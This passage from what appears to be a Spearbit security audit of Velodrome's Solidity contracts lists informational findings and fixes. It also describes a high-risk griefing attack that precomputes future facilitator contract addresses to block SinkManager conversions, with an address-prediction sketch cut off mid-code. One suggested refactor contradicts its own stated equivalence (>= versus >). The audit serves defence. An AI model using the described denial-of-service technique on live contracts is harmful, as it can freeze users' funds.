Description: While the BribeVotingReward contract intends to allow bribes from anyone, the FeesVotingReward contract is designed to receive fees only from the Gauge contract. This is inconsistent with other reward contracts like LockedManagedReward.
Recommendation: Ensure this is acceptable behaviour and consider documenting it within FeesVotingReward. Alternatively, it may be worthwhile restricting the notifyRewardAmount() function to be callable only from the Gauge contract.
Velodrome: I think in line with making permissions as restrictive as possible, we can go with restricting notifyRewardAmount for FeesVotingReward to the gauge only. Something like:

require(IVoter(voter).gaugeToFees(sender) == address(this));

Velodrome: Fixed in commit 8de67e. Spearbit: Verified.
+5.6.4 Missing check in merge if the _to NFT has voted
Severity: Informational
Context: VotingEscrow.sol#L1130
Description: The merge() function is used to combine a _from veNFT into a _to veNFT. It starts with a check on whether the _from veNFT has voted, but it does not check whether the _to veNFT has voted. This will cause the user to have less voting power, leaving rewards and/or emissions on the table, if they don't call poke() or reset(). Although this would only be an issue for an unaware user, an aware user would still have to waste gas on either of the following: 1. An extra call to poke() or reset(). 2. Voting with the _to veNFT and then calling merge().
Recommendation: Consider adding the following check:

require(!voted[_to], "VotingEscrow: voted");

Velodrome: This is a known issue. We removed the requirement on _to as it creates a worse user experience (e.g. you may vote and then realize you want to merge but can't, and have to wait until the next epoch). By not constraining _to, the user has a few more options, with the trade-off being they must call poke() if they merge or risk losing some rewards that epoch. We also made voting (Voter::vote()) much more flexible in that regard. Anybody increasing their veNFT lock amount or merging into their veNFT, or generally those who want to change their vote last minute, are free to do it. The V2 front-end will communicate the need to re-cast votes after:
• merge()
• increaseAmount()
• increaseUnlockTime()
Regarding poke, we will not be adding it to VotingEscrow due to gas concerns. I think regarding this issue, we will leave it as is, as it provides greater flexibility in how users can use their veNFTs. Confirmed with the team.
Spearbit: Acknowledged.
+5.6.5 Ratio of invariant _k to totalSupply of the AMM pool may temporarily decrease
Severity: Informational
Context: Pair.sol#L365-L386
Description: The burn function directly sends the reserves pro-rated to the liquidity tokens. This is simple and elegant. Nevertheless, two features of the current AMM lead to a strange situation: 1. The fee of the AMM pool is sent to the fee contract instead of being absorbed into the pool. 2. The stable pool's curve x^3*y + y^3*x has a larger rounding error compared to Uni-v2's constant product formula.
The invariant K in a stable pool can decrease temporarily when a user performs certain actions such as minting LP tokens, swapping, or withdrawing liquidity. This means the ratio of K to the total supply of the pool is not monotonically increasing. In most cases, this temporary decrease is negligible and the ratio of K to the total supply of the pool will eventually increase again. However, the ratio of K to the total supply is an important metric for calculating the value of LP tokens, which are used in many protocols. If these protocols are not aware of the temporary decrease in the K value, they may suffer serious issues (e.g. overflow).
The root cause of this issue is that there are always rounding errors when using "balance" to calculate invariant k, and sometimes the rounding error is larger. If an LP position is minted when the rounding error is small (the ratio of amount to k is small) and withdrawn when the rounding error is large (the ratio of amount to k is large), the total invariant decreases. We can find a counter-example where the invariant decreases:

function testRoundingErrorAttack(uint swapAmount) public {
    // The counter-example: swapAmount = 52800410888861351333
    vm.assume(swapAmount < 100_000_000 ether);
    vm.assume(swapAmount > 10 ether);
    uint reserveA = 10 ether;
    uint reserveB = 10 ether;
    uint initialK = _k(reserveA, reserveB);
    reserveA *= 2;
    reserveB *= 2;
    uint tempK = _k(reserveA, reserveB);
    reserveB -= _getAmountOut(swapAmount, token0, reserveA, reserveB);
    reserveA += swapAmount;
    vm.assume(tempK <= _k(reserveA, reserveB));
    reserveA -= reserveA / 2;
    reserveB -= reserveB / 2;
    require(_k(reserveA, reserveB) > initialK, "Rounding error attack!");
}

Recommendation: We recommend documenting this issue. The ratio of invariant k to totalSupply is a common way to securely value LP tokens, so this may break external protocols (e.g. an overflow when evaluating rewards distribution in a vault). There are rounding errors everywhere; in most cases this would not be critical. The burn function of the AMM pool, while bearing some rounding error, is an efficient way to return liquidity, and modifying the mechanism of burning liquidity in an AMM pool could introduce serious issues.
Velodrome: Will add documentation around this issue. Spearbit: Acknowledged.
+5.6.6 Inconsistent check for adding value to a lock
Severity: Informational
Context: VotingEscrow.sol#L807
Description: depositFor allows anyone to add value to an existing lock. However increaseAmount, which for NORMAL locks performs the same operation, has a check that only allows an approved address or the owner to increase the amount.
Recommendation: Document the inconsistency, or decide whether the check should be performed in both functions or removed from both.
Velodrome: We're considering keeping depositFor open and just documenting its purpose. Spearbit: Acknowledged.
+5.6.7 Privileged actors are incentivized to front-run each other
Severity: Informational
Context: Voter.sol#L209-L224
Description: Privileged actors are incentivized to front-run each other and vote at the last second. Because of the FIFS OP sequencer, managers will try to vote exactly at the penultimate block in order to maximize their options (voting can only be done once).
Recommendation: None provided; see the team's response.
Velodrome: These actions already exist in the current protocol design, as users want to wait as long as possible to vote for the rewards with the highest APY. It makes it hard to know for certain how well a bribe works until the voting period is over, and perhaps some voters wait just a second too long and miss voting, but otherwise we have not seen a design solution that remediates this. Spearbit: Acknowledged.
+5.6.8 First nudge propose must happen one epoch before tail is set to true
Severity: Informational
Context: Minter.sol#L65-L84
Description: Because a nudge can only be proposed one epoch in advance, the first propose call will need to happen in the last epoch in which tail is set to false. While the transaction simulation will fail for execute, the EpochGovernor.propose math makes it so that the first proposal has to be initiated an epoch early in order to be executable on the first tail epoch.
Recommendation: Remind end users about this quirk and perhaps host an event for it.
Velodrome: Acknowledged, will update the documentation to make this clearer. Spearbit: Acknowledged.
+5.6.9 Missing emit of important events
Severity: Informational
Context: ManagedRewardsFactory.sol#L10, PairFactory.sol
Description: Contracts that change or create sensitive information should emit an event.
Recommendation: Add events to emit for (a sketch follows this finding):
• ManagedRewardsFactory: creating new managed rewards
• PairFactory: setVoter, setPauser, setPauseState and setFeeManager
Velodrome: Fixed in commit eb7f0e. Spearbit: Verified.
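A sketch of the event wiring recommended in 5.6.9; the event name and shape are illustrative assumptions, not the team's implementation:

pragma solidity ^0.8.13;

contract PairFactory {
    address public voter;

    // Hypothetical event recording both the old and new address
    event VoterSet(address indexed previousVoter, address indexed newVoter);

    function setVoter(address _voter) external {
        // ... authorization checks ...
        emit VoterSet(voter, _voter);
        voter = _voter;
    }
}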
+5.6.10 Marginal rounding errors when using small values
Severity: Informational
Context: Voter.sol#L187
Description: It may be helpful to encourage end users to use BPS or higher denominations for weights when dealing with multiple gauges, to keep precision high. Due to the widespread usage of the _vote function throughout the codebase and in forks, it may be best to suggest this in documentation to avoid reverts.
Recommendation: It is recommended to validate the weights at a minimum of 1 BPS.
Velodrome: I believe this should be handled by the front end. Suggest that minimum increments should be single basis points? I think at the moment the front end only lets you select in 1% increments (i.e. 100 BPS). We can add additional documentation to note this though. Spearbit: Acknowledged.
+5.6.11 Prefer to use nonReentrant on external functions
Severity: Informational
Context: Voter.sol#L166-L170
Description: It may be best to use nonReentrant on the external functions rather than the internal ones. vote, for example, is not protected directly; only the internal function is.
Recommendation: It is recommended to move the nonReentrant modifier from the internal _vote to the external functions vote and poke, as sketched below.
Velodrome: Fixed in commit 111d83. Spearbit: Verified.
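A minimal sketch of the change recommended in 5.6.11, with heavily simplified signatures (the real Voter functions take more parameters):

pragma solidity ^0.8.13;

import {ReentrancyGuard} from "@openzeppelin/contracts/security/ReentrancyGuard.sol";

contract Voter is ReentrancyGuard {
    // Internal helper: no longer carries the guard itself
    function _vote(uint256 _tokenId) internal {
        // ... voting logic ...
    }

    // External entry points carry the nonReentrant modifier instead
    function vote(uint256 _tokenId) external nonReentrant {
        _vote(_tokenId);
    }

    function poke(uint256 _tokenId) external nonReentrant {
        _vote(_tokenId);
    }
}

Guarding the entry points makes the protection visible at the external surface instead of relying on callers knowing which internal helpers are guarded.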
+5.6.12 Redundant variable update
Severity: Informational
Context: Gauge.sol#L180-L211
Description: In notifyRewardAmount the variable lastUpdateTime is updated twice.
Recommendation: It is recommended to remove one update of lastUpdateTime:

function notifyRewardAmount(uint256 _amount) external nonReentrant {
    ...
-   lastUpdateTime = lastTimeRewardApplicable();
    ...
    lastUpdateTime = timestamp;
    ...
}

Velodrome: Fixed in commit a336f7. Spearbit: Verified.
+5.6.13 Turn logic into internal function
Severity: Informational
Context: Gauge.sol#L109-L112, Gauge.sol#L145-148, Gauge.sol#L161-L164
Description: In the Gauge contract, the logic updating rewardPerTokenStored, lastUpdateTime, rewards and userRewardPerTokenPaid can be converted to an internal function for simplicity.
Recommendation: It is recommended to create an internal function and replace this logic:

function getReward(address _account) external nonReentrant {
    ...
-   rewardPerTokenStored = rewardPerToken();
-   lastUpdateTime = lastTimeRewardApplicable();
-   rewards[_account] = earned(_account);
-   userRewardPerTokenPaid[_account] = rewardPerTokenStored;
+   _updateRewards(_account);
    ...
}

+function _updateRewards(address _account) internal {
+    rewardPerTokenStored = rewardPerToken();
+    lastUpdateTime = lastTimeRewardApplicable();
+    rewards[_account] = earned(_account);
+    userRewardPerTokenPaid[_account] = rewardPerTokenStored;
+}

Velodrome: Fixed in commit a336f7. Spearbit: Verified.
+5.6.14 Add extra slippage on the client side when dependent paths are used in generateZapInParams
Severity: Informational
Context: Router.sol#L759-L790, Router.sol#L793-L823
Description: generateZapInParams is a helper function in Router that calculates the parameters for zapIn. If there is a duplicate pair in routesA and routesB, the value calculated here will be off. For example, the optimal path to swap DAI into the USDC/VELO pair would likely have DAI/ETH in both routesA and routesB. When the user uses these params to call zapIn, it executes two swaps: DAI -> ETH -> USDC and DAI -> ETH -> VELO. As the price of DAI/ETH changes after the first swap, the second swap gets a slightly worse price, and the zapIn will likely revert as it does not meet the minimum token return.
Recommendation: As mentioned by the project team, the front end will add extra slippage when dependent paths are used. It would be good if this were documented.
Velodrome: Will add documentation. Spearbit: Acknowledged.
+5.6.15 Unnecessary skim in router
Severity: Informational
Context: Router.sol#L258, Router.sol#L311
Description: The pair contract absorbs any extra tokens after swap, mint, and burn. Triggering skim after burn/mint would not return extra tokens.
Recommendation: We can save gas by skipping one external call. We have to be careful when providing liquidity: if the router does not get the optimal token amount when providing liquidity, the user simply loses funds. As a result, we recommend adjusting the comment in quoteLiquidity.
Velodrome: Fixed in commit eb7f0e. Spearbit: Verified.
+5.6.16 Overflow is not desired and can lead to loss of funds in Solidity ^0.8.0
Severity: Informational
Context: Pair.sol#L235
Description: In Solidity ^0.8.0, uint overflow reverts by default.

// Pair.sol#L235-L239
uint256 timeElapsed = blockTimestamp - blockTimestampLast; // overflow is desired
if (timeElapsed > 0 && _reserve0 != 0 && _reserve1 != 0) {
    reserve0CumulativeLast += _reserve0 * timeElapsed;
    reserve1CumulativeLast += _reserve1 * timeElapsed;
}

The calculation reserve0CumulativeLast += _reserve0 * timeElapsed will overflow and DOS the pair if _reserve0 is too large. As a result, the pool should not support high-decimals tokens.
Recommendation: High-decimals tokens will break the protocol in many places (e.g. the invariant formula would overflow), so this revert is unlikely to be triggered in any case. Recommend the team just change the misleading comment.
Velodrome: Will update documentation. Spearbit: Acknowledged.
+5.6.17 Unnecessary casting
Severity: Informational
Context: Voter.sol#L148
Description: _totalWeight is already declared as uint256.
Recommendation: Remove the uint256 casting of _totalWeight.
Velodrome: Fixed in commit 111d83. Spearbit: Verified.
+5.6.18 Refactor retrieving the current epoch into a library
Severity: Informational
Context: Voter.sol#L81-L83
Description: The logic to retrieve the current epoch could be refactored into a library function.
Recommendation: Refactor the logic of retrieving the current epoch into a library function; see the sketch below.
Velodrome: Issue addressed in commit 111d83. Spearbit: Verified.
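A sketch of such a library; the name mirrors the VelodromeTimeLibrary referenced later in this report, but the body shown here is illustrative:

pragma solidity ^0.8.13;

library VelodromeTimeLibrary {
    uint256 internal constant WEEK = 7 days;

    // Start of the WEEK-aligned epoch containing `timestamp`
    function epochStart(uint256 timestamp) internal pure returns (uint256) {
        unchecked {
            return timestamp - (timestamp % WEEK);
        }
    }
}

Call sites then replace inline arithmetic with VelodromeTimeLibrary.epochStart(block.timestamp), keeping the rounding rule in one place.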
+5.6.19 Add governor permission to sensitive functions
Severity: Informational
Context: VotingEscrow.sol#L217-L222
Description: Some functions that change important variables could also allow the governor to make changes. setManagedState in VotingEscrow is one function where adding governor permission is recommended.
Recommendation: It is recommended to change the code as follows:

function setManagedState(uint256 _mTokenId, bool _state) external {
-   require(msg.sender == IVoter(voter).emergencyCouncil(), "VotingEscrow: not emergency council");
+   require(_msgSender() == IVoter(voter).emergencyCouncil() || _msgSender() == IVoter(voter).governor(), "VotingEscrow: not emergency council");
    ...
}

Velodrome: Fixed in commit eb7f0e. Spearbit: Verified.
+5.6.20 Admin privilege through proposal threshold
Severity: Informational
Context: VeloGovernor.sol#L39-L47
Description: As an admin privilege of the team, the variable proposalNumerator can be changed, causing proposalThreshold to be higher than expected. The team could front-run calls to propose and increase the numerator, which could block proposals.
Recommendation: Settings of this type should be changeable only by a multi-sig wallet.
Velodrome: Acknowledged. Spearbit: Acknowledged.
+5.6.21 Simplify check for rounding error
Severity: Informational
Context: Voter.sol#L415, Gauge.sol#L71
Description: The rounding-error check can be simplified: instead of using A / B > 0, use a direct comparison (for unsigned integers, A / B > 0 is equivalent to A >= B).
Recommendation: It is recommended to refactor to:

// Voter
- if (_claimable > IGauge(_gauge).left() && _claimable / DURATION > 0) {
+ if (_claimable > IGauge(_gauge).left() && _claimable > DURATION) {

// Gauge
- if (_fees0 > IReward(feesVotingReward).left(_token0) && _fees0 / DURATION > 0) {
+ if (_fees0 > IReward(feesVotingReward).left(_token0) && _fees0 > DURATION) {

Velodrome: Fixed in commit 111d83. Spearbit: Verified.
+5.6.22 Storage declarations in the middle of the file
Severity: Informational
Context: Voter.sol#L317-L319
Description: Storage variables are declared in the middle of the file.
Recommendation: If you wish to keep the logic separate, consider creating a separate abstract contract with all storage variables.
Velodrome: Elected to move storage declarations to the top of the file. Spearbit: Verified.
+5.6.23 Inconsistent usage of _msgSender()
Severity: Informational
Context: Voter.sol#L75-L78, Voter.sol#L124, VotingEscrow.sol#L63, VotingEscrow.sol#L209, VotingEscrow.sol#L218, VotingEscrow.sol#L234, VotingEscrow.sol#L239, VotingEscrow.sol#L256, VotingEscrow.sol#L547
Description: There are some instances where msg.sender is used in contrast with the _msgSender() function.
Recommendation: It is recommended to keep the pattern consistent and change msg.sender to _msgSender().
Velodrome: Fixed in commit eb7f0e. Spearbit: Verified.
+5.6.24 Change of emergency council should be enabled for Governor
Severity: Informational
Context: Voter.sol#L117-L120
Description: The governor may also want to be able to set and change the emergency council; this avoids the potential risk of the council abusing its power.
Recommendation: It is recommended to also check whether the sender is the governor:

function setEmergencyCouncil(address _council) public {
-   require(_msgSender() == emergencyCouncil, "Voter: not emergency council");
+   require(_msgSender() == emergencyCouncil || _msgSender() == governor, "Voter: not emergency council or governor");
    emergencyCouncil = _council;
}

Velodrome: List of emergency council permissions:
• Set emergency council
• Kill or revive a gauge
• Set the name / symbol of a pair (NEW)
• Veto a proposal (unconfirmed)
I will consult with the team. I think if the vetoer will be set to emergencyCouncil, it does not make much sense to allow emergencyCouncil to be settable by governor. Ran this by the team and we'd like to keep things separate:
• Allow veto (vetoer function) to be called by the team msig: this way the team can veto any governor actions/proposals as a protocol responsible party.
• Do not allow the governor to change/set the emergency council msig: this way only the previous emergency council can change the msig of the new council.
A bit more reasoning: our goal is to make Velodrome fully decentralized. The emergency council would eventually be replaced by the governor, meaning it makes sense to keep the veto right separate from such a change. Naturally, the very next step would be to renounce the vetoer right from the team.
Spearbit: Acknowledged.
+5.6.25 Unnecessary inheritance in Velo contract
Severity: Informational
Context: Velo.sol#L9
Description: Velo isn't used for governance, therefore it's not necessary to inherit from ERC20Votes.
Recommendation: It is recommended to replace ERC20Votes with ERC20Permit.
Velodrome: Fixed in commit eb7f0e. Spearbit: Verified.
+5.6.26 Incorrect value in Mint event
Severity: Informational
Context: Minter.sol#L120
Description: In Minter#update_period the Mint event is emitted with incorrect values.
Recommendation: It is recommended to use updated values:

- emit Mint(msg.sender, _emission, _totalSupply, _tail);
+ emit Mint(msg.sender, _emission, velo.totalSupply(), _tail);

Velodrome: Fixed in commit eb7f0e. Spearbit: Verified.
+5.6.27 Do not cache constants
Severity: Informational
Context: Minter.sol#L74
Description: It is not necessary to cache a constant variable.
Recommendation: It is recommended to use the constant instead of caching it.
Velodrome: Fixed in commit eb7f0e. Spearbit: Verified.
+5.6.28 First week will have no emissions
Severity: Informational
Context: Minter.sol#L54
Description: update_period cannot be called during the first week, because the constructor sets the active period to the current one. Emissions will start at most one week later.
Recommendation: It is recommended to set the period in the constructor to one week earlier:

constructor(...) {
    ...
-   active_period = ((block.timestamp) / WEEK) * WEEK; // allow emissions this coming epoch
+   active_period = (((block.timestamp) / WEEK) * WEEK) - WEEK; // allow emissions this coming epoch
}

Velodrome: I think the logistics of the migration will involve deployment shortly after the epoch flip, with emissions being distributed to gauges for that week (on v1). Migration can then begin, with protocols bribing on the new contracts and votes accumulating on new pools as the week progresses. Then the following week, emissions will be distributed on v2 as normal. Since update_period is callable by anyone, it does not make sense to allow emissions to be distributed immediately, as there should be some grace period to allow users to migrate and for votes to populate (e.g. imagine a situation where someone votes for their own pool and then calls update_period immediately). V1 and V2 will operate in tandem, and the V2 transition will be progressive and will require communication from our side either way. Overall, the bump in emissions on V2 in the beginning should compensate folks who opt to move their liquidity to V2 gauges in the very first week. Spearbit: Acknowledged.
+5.6.29 Variables can be renamed for better clarity
Severity: Informational
Context: Minter.sol#L23
Description: For better understanding, some variables could be renamed.
Recommendation: It is recommended to rename the following variable:

- uint256 public constant EMISSION = 9_900;
+ uint256 public constant WEEKLY_DECAY = 9_900;

Velodrome: Fixed in commit eb7f0e. Spearbit: Verified.
+5.6.30 Minter week will eventually shift
Severity: Informational
Context: Minter.sol#L21
Description: The constant WEEK is used as the duration of an epoch that resets every Thursday; after 4 years (4 * 365.25 days) the day of the week will eventually shift, no longer following the Thursday cadence.
Recommendation: This is an informational issue without a fix; the week shift will eventually happen, and Velodrome should be aware of this change.
Velodrome: Noted, we will document it somewhere to make it clearer and change references to Thursday in the code. Spearbit: Acknowledged.
+5.6.31 Ownership change will break certain yield farming automations
Severity: Informational
Context: VotingEscrow.sol#L137-L138
Description: Due to the check, any transfer done in the same block as the call to depositManaged will revert. While a way for malicious users to sidestep the mechanic was shown, the check will prevent a common use case in yield farming: zapping. Because of the check, an end user will not be able to zap from their VELO to VE to the managed position, which may create a sub-par experience for end users. It also creates worse UX for yield farming projects, as they will have to separate the transfer from the deposit, which will cost them more gas and may make their product less capital efficient.
Recommendation: Consider the ownershipChange lock further and decide whether it's worth maintaining or removing.
Velodrome: Fixed in commit 02e0bc. Spearbit: Verified.
+5.6.32 Quantitative analysis of Minter logic
Severity: Informational
Context: Minter.sol#L32
Description: It will take 110 iterations to go from 15M to the tail emission threshold.

Minter.sol#L32-L37
/// @notice When emissions fall below this amount, begin tail emissions
uint256 public constant TAIL_START = 5_000_000 * 1e18;
/// @notice Tail emissions rate in basis points
uint256 public tailEmissionRate = 30;
/// @notice Starting weekly emission of 15M VELO (VELO has 18 decimals)
uint256 public weekly = 15_000_000 * 1e18;

## Python allows decimal math; wlog, just take the mantissa
INITIAL = 15 * 10 ** 6
TAIL = 5 * 10 ** 6
MULTIPLIER_BPS = 9_900
MAX_BPS = 10_000

value = INITIAL
i = 0
min_emitted = 0
while value > TAIL:
    i += 1
    min_emitted += value
    value = value * MULTIPLIER_BPS / MAX_BPS

# i           -> 110
# value       -> 4965496.324815211
# min_emitted -> 1003450367.5184793

## If nobody ever bridged, this would be emissions at tail
# min_emitted * 30 / 10_000 -> 3010351.1025554384

Tail emissions are most likely going to be a discrete step down in emissions:

# min_emitted -> 1003450367.5184793
V1_CIRC = 150 * 10 ** 6
ranges = range(V1_CIRC // 10, V1_CIRC, V1_CIRC // 10)
for val in ranges:
    print((min_emitted + val) * 30 / 10_000)
# 3055351.1025554384
# 3100351.1025554384
# 3145351.1025554384
# 3190351.1025554384
# 3235351.1025554384
# 3280351.1025554384
# 3325351.1025554384
# 3370351.1025554384
# 3415351.1025554384

The last value before the tail will most likely be around 1 million fewer tokens minted per period. The maximum mintable value is slightly above tail, with the absolute max being way above tail:

## Max supply
# 1000 * 10 ** 6 -> 1000000000
min_emitted = 1003450367.5184793
max_circ = 1000 * 10 ** 6 + min_emitted
max_mint = max_circ * 30 / 10_000
## If we assume min_emitted + 1 billion VELO v1 sinked
# max_mint -> 6010351.102555438
## If we assume nudge to 100 BPS
abs_max_mint = max_circ * 100 / 10_000
# abs_max_mint -> 20034503.675184794

Recommendation: Consider whether these are the intended consequences.
Velodrome: QA 1: 110 weeks looks alright. QA 2:

CUR_EPOCH = 38
TAIL_EPOCH = 110
CUR_SUPPLY = 841884804.4495
CUR_VE_SUPPLY = 706050740
next_lp, next_rebase = 10238318.925 * 0.99, CUR_VE_SUPPLY * 0.2 / 52
total_supply = CUR_SUPPLY
ve_supply = CUR_VE_SUPPLY
for week in range(CUR_EPOCH, TAIL_EPOCH):
    total_supply += next_lp + next_rebase
    # team
    total_supply += 0.03 * (next_lp + next_rebase)
    ve_supply = 0.8 * total_supply
    next_lp, next_rebase = next_lp * 0.99, ve_supply * 0.2 / 52

(Assuming 20% rebase APY and 80% lock rate.) Results:

# total_supply -> 1668569723.3304946
# total_supply * 30 / 10_000 -> 5005709.169991484

QA 3: Tbh I can't see anything wrong here; even if the governance of velofed decides tailEmissionRate should be up to the maximum, it's still working as intended. From the economic design it looks like we chose to multiply tailEmissionRate by totalSupply instead of scaling a fixed value like 5M, so the amount minted is going to be a divergent series even with a fixed tailEmissionRate.
Spearbit: Acknowledged.
+5.6.33 Optimism's block production may change in the future
Severity: Informational
Context: GovernorSimpleVotes.sol#L22, VeloGovernor.sol#L31
Description: In contrast to OZ's Governor, which uses timestamps, the GovernorSimpleVotes contract uses block numbers. Because OP may change block frequency in the future, and given Bedrock's update to block.timestamp, it may be desirable to refactor back to the OZ implementation. VeloGovernor also assumes 2 blocks every second. OP's docs say block.number is not a reliable timing reference: community.optimism.io/docs/developers/build/differences/#block-numbers-and-timestamps. It is also dangerous to use block.number at this time, because it will probably mean different things pre- and post-Bedrock upgrade.
Recommendation: The recommendation is to refactor back to the OZ implementation.
Velodrome: Given OpenZeppelin's support for a more flexible Governor that allows contracts to select a clock of their liking, we have elected to refactor back to a timestamp-based system while choosing timestamps as the default clock for VotingEscrow. Refactored towards timestamp-based Governors in this PR: commit 08c2bc. Spearbit: Verified.
+5.6.34 Remove unnecessary check
Severity: Informational
Context: GovernorSimple.sol#L266-L267
Description: These checks are unnecessary, because the code already checks that the targets and calldatas lengths are equal to 1.
Recommendation: Remove the checks:

- require(targets.length == values.length, "GovernorSimple: invalid proposal length");
- require(targets.length == calldatas.length, "GovernorSimple: invalid proposal length");

Velodrome: Acknowledged and will fix. Spearbit: Acknowledged.
+5.6.35 Event is missing indexed fields
Severity: Informational
Context: Pair.sol#L70-L73, Pair.sol#L81-L82, IMinter.sol#L4, IMinter.sol#L6, IPairFactory.sol#L4-L5, IReward.sol#L4-L7, IRewardDistributor.sol#L4-L5, ISinkManager.sol#L7-L8, ISinkManager.sol#L16, IVoterEscrow.sol#L42, IVoterEscrow.sol#L50-L52, IVoterEscrow.sol#L74, IFactoryRegistry.sol#L5-L7, IVoter.sol#L13-L18, IGauge.sol#L4-L8, SinkConverter.sol#L21
Description: Indexed event fields are more quickly accessible to off-chain tools that parse events. However, each indexed field costs extra gas during emission, so it is not necessarily best to index the maximum allowed per event (three fields). Each event should use three indexed fields if there are three or more fields and gas usage is not a particular concern for the events in question. If there are fewer than three fields, all of the fields should be indexed.
Recommendation: Consider ensuring that all events are indexed correctly for the protocol's needs; see the sketch below.
Velodrome: Acknowledged, we will make changes accordingly. Spearbit: Acknowledged.
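Illustrative declarations (hypothetical events, not the audited interfaces) showing the recommended indexing:

pragma solidity ^0.8.13;

interface IGaugeEvents {
    // Fewer than three fields: index all of them.
    event GaugeKilled(address indexed gauge);

    // Three or more fields: index three, when emission gas is not a concern.
    event Deposited(address indexed from, uint256 indexed tokenId, address indexed gauge, uint256 amount);
}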
+5.6.36 Missing checks for address(0) when assigning values to address state variables
Severity: Informational
Context: Velo.sol#L22, Velo.sol#L28, VeloGovernor.sol#L36, Voter.sol#L101, Voter.sol#L107, Voter.sol#L113, Voter.sol#L119, VotingEscrow.sol#L64, VotingEscrow.sol#L66, VotingEscrow.sol#L235, VotingEscrow.sol#L240, VotingEscrow.sol#L1114, FactoryRegistry.sol#L26-L28, RewardsDistributor.sol#L39-L40, RewardsDistributor.sol#L308, PairFactory.sol#L12, PairFactory.sol#L54, PairFactory.sol#L64-L65, PairFactory.sol#L64-L66, PairFactory.sol#L85, PairFactory.sol#L87, PairFactory.sol#L95, SinkManager.sol#L134
Description: Lack of zero-address validation on address parameters may lead to transaction reverts, wasted gas, resubmission of transactions, and may even force contract redeployments in certain cases within the protocol.
Recommendation: Consider adding explicit zero-address validation on input parameters of address type, as sketched below.
Velodrome: Acknowledged. Spearbit: Acknowledged.
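A sketch of the validation pattern; the setter and error name are illustrative, though the ZeroAddress error style matches snippets shown later in this report:

pragma solidity ^0.8.13;

contract Voter {
    error ZeroAddress(); // hypothetical custom error

    address public governor;

    function setGovernor(address _governor) external {
        // ... authorization checks ...
        if (_governor == address(0)) revert ZeroAddress(); // reject the zero address before assignment
        governor = _governor;
    }
}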
+5.6.37 Incorrect comment
Severity: Informational
Context: Mentioned in Recommendation
Description: There are a few mistakes in the comments that can be corrected in the codebase.
Recommendation:
• Router.sol#L148: Invalid comment, as this function does not create a new pair if it doesn't exist yet.

- // create the pair if it doesn't exist yet
  address _pair = IPairFactory(_factory).getPair(tokenA, tokenB, stable);
  (uint256 reserveA, uint256 reserveB) = (0, 0);

• Router.sol#L179: Invalid comment, as this function does not create a new pair if it doesn't exist yet.

  require(amountADesired >= amountAMin);
  require(amountBDesired >= amountBMin);
- // create the pair if it doesn't exist yet
  address _pair = IPairFactory(defaultFactory).getPair(tokenA, tokenB, stable);

Velodrome: Fixed in commit eb7f0ed. Spearbit: Verified.
+5.6.38 Discrepancies between specification and implementation
Severity: Informational
Context: Router.sol#L579, Router.sol#L718
Description: Instance 1 - Zapping. The specification mentions that zapping into a pool from any token is supported. The following is the extract:
• Swapping and lp depositing/withdrawing of fee-on-transfer tokens.
• Zapping in and out of a pool from any token (i.e. A->(B,C) or (B,C) -> A). A can be the same as B or C.
• Zapping and staking into a pool from any token.
However, the zapIn and zapOut functions utilize the internal _swap function, which does not support fee-on-transfer tokens.
Recommendation: Consider updating the specification to explicitly state that zapping is not supported for fee-on-transfer tokens. Additionally, consider adding comments to the zapping functions to highlight this limitation.
Velodrome: Fixed in commit eb7f0e. Spearbit: Verified.
+5.6.39 Early exit for withdrawManaged function
Severity: Informational
Context: VotingEscrow.sol#L165
Description: If _mTokenId is zero, there is no point executing the rest of the code within the VotingEscrow.withdrawManaged function.
Recommendation: For defense in depth, consider reverting and exiting the function immediately if _mTokenId is zero, to avoid any potential edge cases when executing the rest of the code.
Velodrome: Fixed in commit 827917. Spearbit: Verified.
6 Appendix
6.1 Appendix: Summary
The findings in this section correspond to the post-engagement review conducted over a split period of two separate weeks: the week of May 22nd to May 26th and the week of June 12th to June 16th. Commit e5635f was reviewed during the first period. Fixes and other modifications were implemented by the Velodrome team in between the first and second period. During the second period, commit 274c77 was used.
6.2 High Risk
+6.2.1 DOS attack at future facilitator contract can stop SinkManager.convertVe
Severity: High Risk
Context: SinkManager.sol#L123
Description: As noted in "DOS attack by delegating tokens at MAX_DELEGATES = 1024", the old votingEscrow has a gas concern: the gas cost of transfer/burn increases when an address holds multiple NFT tokens. The concern becomes more serious when the protocol is deployed on Optimism, where the gas limit is smaller than on other L2 chains. If an address is being attacked and holds the maximum number of NFT tokens (1024), the user cannot withdraw funds due to the gas limit.
To mitigate the potential DOS attack, where the attacker DOSes v1's votingEscrow and stops the sinkManager from receiving tokens, the sinkManager utilizes a facilitator contract. When the sinkManager needs to receive the votingEscrow NFT, it creates a new contract specifically for this purpose. Since the contract is newly created, it does not contain any tokens, making it more gas-efficient to receive the token through the facilitator contract. However, the attacker can DOS the contract by sending NFT tokens to a future facilitator (see the Solidity docs on salted contract creations / CREATE2). When creating a contract with CREATE, the address of the new contract is computed from the address of the creating contract and a counter (nonce) that increases with each contract creation.
The exploit scenario: at the time the sinkManager is deployed, zero facilitators have been created. The attacker can calculate the addresses of all future facilitators by computing sha3(rlp.encode([normalize_address(sender), nonce]))[12:] (a sketch of this computation follows this finding). The attacker computes the 10th facilitator's address and sends 1024 NFT tokens to that address. The sinkManager will function normally nine times; however, when the 10th user wants to convert a token, the sinkManager deploys the facilitator at the 10th address. Since that facilitator already holds 1024 NFT positions, it cannot receive any more tokens. The transaction will revert and the sinkManager will be stuck in its current state.
Recommendation: Recommend using cloneDeterministic (Clones.sol#L45-L56) with an unpredictable salt:

uint256 private counter;

// ...

/// @inheritdoc ISinkManager
function convertVe(uint256 tokenId) external nonReentrant returns (uint256 tokenIdV2) {
    // ...
    // Create contract to facilitate the merge
    SinkManagerFacilitator facilitator = SinkManagerFacilitator(
        Clones.cloneDeterministic(
            facilitatorImplementation,
            keccak256(abi.encodePacked(counter, blockhash(block.number - 1)))
        )
    );
    counter++;
    // ...
}

The fix tries to achieve two behaviors: 1. Put some randomness into the facilitator's address so that the attacker can't predict and attack it. 2. The sinkManager should not be stopped even if one address fails to receive tokens.
Velodrome: Fixed in commit 7b35b2. In addition to blockhash(block.number - 1), an additional user-provided salt is included to further increase the cost of griefing attacks.
Spearbit: Verified.
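A sketch of the address precomputation described above, valid for creator nonces between 1 and 127; the library wrapper is illustrative:

pragma solidity ^0.8.13;

library CreateAddressLib {
    // Predicts the CREATE address of `deployer` at `nonce`, for 1 <= nonce <= 127.
    function predictCreateAddress(address deployer, uint8 nonce) internal pure returns (address) {
        // RLP encoding of [deployer, nonce] in this range is:
        // 0xd6 (list prefix: 0xc0 + 22 payload bytes) ++ 0x94 (0x80 + 20) ++ deployer ++ nonce
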